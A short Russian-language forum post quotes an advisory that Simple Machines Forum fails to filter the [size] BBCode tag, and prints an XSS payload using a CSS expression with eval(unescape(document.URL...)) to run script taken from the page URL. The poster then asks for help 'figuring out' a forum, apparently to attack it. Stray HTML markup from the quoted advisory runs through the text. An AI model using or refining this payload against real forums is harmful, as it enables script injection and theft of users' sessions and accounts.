Уязвимость обнаружена в Simple Machines SMF. Удаленный пользователь может выполнить XSS нападение. SMF не фильтрует данные, представленные пользователем в тэге '[size]'. Пример: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[size=expression(eval(unescape(document.URL.substring(document.URL. length-41,document.URL.length))))]Big Exploit[/size][/QUOTE]<span id='postcolor'> если кому не лень помогите мне с этим форумом разобраться,а то я уже весь мозг напряг но так ничего и не придумал
